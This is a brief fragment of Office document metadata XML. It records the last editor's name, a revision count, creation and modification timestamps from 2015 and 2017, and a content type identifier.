  <cp:lastModifiedBy>karl de heer</cp:lastModifiedBy>
  <cp:revision>250</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-11-24T10:12:06Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-09-26T09:15:21Z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0x0101007D22EFC5F6A45A42AABBFD279E0D1267</vt:lpwstr>
  </property>
</Properties>
</file>